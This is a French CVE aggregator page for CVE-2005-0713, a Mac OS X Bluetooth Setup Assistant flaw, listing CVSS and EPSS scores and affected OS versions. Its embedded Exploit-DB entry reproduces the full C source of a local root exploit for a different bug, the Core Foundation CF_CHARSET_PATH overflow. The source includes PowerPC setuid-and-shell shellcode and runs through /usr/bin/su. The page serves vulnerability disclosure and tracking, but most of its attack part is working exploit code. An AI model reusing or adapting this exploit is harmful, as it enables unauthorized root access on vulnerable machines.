CVE-2005-0713 : Détail

CVE-2005-0713

0.15%V4
Local
2005-03-22
05h00 +00:00
2024-09-17
02h06 +00:00
CVE.org
NVD
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

The Bluetooth Setup Assistant for Mac OS X before 10.3.8 can be launched without a keyboard or Bluetooth device, which allows local users to bypass access restrictions and gain privileges.

Informations du CVE

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 4.6 AV:L/AC:L/Au:N/C:P/I:P/A:P nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
EPSS First.org

Informations sur l'Exploit

Exploit Database EDB-ID : 25256

Date de publication : 2005-03-20 23h00 +00:00
Auteur : V9
EDB Vérifié : Yes

// source: https://www.securityfocus.com/bid/12863/info Multiple security vulnerabilities are reported to affect Apple Mac OS X. These issues were disclosed in the referenced vendor advisory. Insecure permissions are reported to be set on certain Apple Mac OS X folders . It is reported that because of these insecure permissions local attackers may exploit race conditions. The CVE Mitre candidate ID CAN-2005-0712 is assigned to this issue. This vulnerability is reported to affect Apple Mac OSX, and OSX Server version 10.3.8. Previous versions might also be affected. Core Foundation is reported prone to a local buffer overflow vulnerability. It is reported that this issue may be exploited in any application that is linked against the Core Foundation Library. An attacker may exploit this vulnerability to execute arbitrary code with elevated privileges. The CVE Mitre candidate ID CAN-2005-0716 is assigned to this issue. This vulnerability is reported to affect Apple Mac OSX, and OSX Server version 10.3.8. Previous versions might also be affected. The Bluetooth Setup Assistant application is reported prone to an unspecified security vulnerability. The CVE Mitre candidate ID CAN-2005-0713 is assigned to this issue. This vulnerability is reported to affect Apple Mac OSX, and OSX Server version 10.3.8. Previous versions might also be affected. The AFP server is reported prone to an information disclosure vulnerability. An attacker may exploit this issue to disclose the contents of Drop Boxes. The CVE Mitre candidate ID CAN-2005-0715 is assigned to this issue. This vulnerability is reported to affect Apple Mac OSX, and OSX Server version 10.3.8. Previous versions might also be affected. /*[ MacOS X[CF_CHARSET_PATH]: local root exploit. ]********* * * * by: v9@fakehalo.us (fakehalo/realhalo) * * * * found by: iDefense (anon finder) * * * * saw the advisory on bugtraq and figured i'd slap this * * together, so simple i had to. exploits via the * * /usr/bin/su binary. you must press ENTER at the * * "Password: " prompt. * ***********************************************************/ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> static char exec[]= /* b-r00t's setuid(0)+exec(/bin/sh). */ "\x7c\x63\x1a\x79\x40\x82\xff\xfd\x7d\x68\x02\xa6\x3b\xeb" "\x01\x70\x39\x40\x01\x70\x39\x1f\xfe\xdf\x7c\x68\x19\xae" "\x38\x0a\xfe\xa7\x44\xff\xff\x02\x60\x60\x60\x60\x7c\xa5" "\x2a\x79\x38\x7f\xfe\xd8\x90\x61\xff\xf8\x90\xa1\xff\xfc" "\x38\x81\xff\xf8\x38\x0a\xfe\xcb\x44\xff\xff\x02\x7c\xa3" "\x2b\x78\x38\x0a\xfe\x91\x44\xff\xff\x02\x2f\x62\x69\x6e" "\x2f\x73\x68\x58"; int main(void){ unsigned int i=0; char *buf,*env[3]; printf("(*)MacOS X[CF_CHARSET_PATH]: local root exploit.\n"); printf("(*)by: v9@fakehalo.us, found by iDefense adv. (anon)\n\n"); if(!(buf=(char *)malloc(1100+1)))exit(1); memcpy(buf,"CF_CHARSET_PATH=",16); printf("[*] setting up the environment.\n"); for(i=16;i<1100;i+=4)*(long *)&buf[i]=(0xbffffffa-strlen(exec)); env[0]=buf; env[1]=exec; env[2]=NULL; printf("[*] executing su... (press ENTER at the \"Password: \"" " prompt)\n\n"); if(execle("/usr/bin/su","su",0,env)) printf("[!] failed executing /usr/bin/su.\n"); exit(0); }

Products Mentioned

Configuraton 0

Apple>>Mac_os_x >> Version 10.3

Apple>>Mac_os_x >> Version 10.3.1

Apple>>Mac_os_x >> Version 10.3.2

Apple>>Mac_os_x >> Version 10.3.3

Apple>>Mac_os_x >> Version 10.3.4

Apple>>Mac_os_x >> Version 10.3.5

Apple>>Mac_os_x >> Version 10.3.6

Apple>>Mac_os_x >> Version 10.3.7

Apple>>Mac_os_x >> Version 10.3.8

Apple>>Mac_os_x_server >> Version 10.3

Apple>>Mac_os_x_server >> Version 10.3.1

Apple>>Mac_os_x_server >> Version 10.3.2

Apple>>Mac_os_x_server >> Version 10.3.3

Apple>>Mac_os_x_server >> Version 10.3.4

Apple>>Mac_os_x_server >> Version 10.3.5

Apple>>Mac_os_x_server >> Version 10.3.6

Apple>>Mac_os_x_server >> Version 10.3.7

Références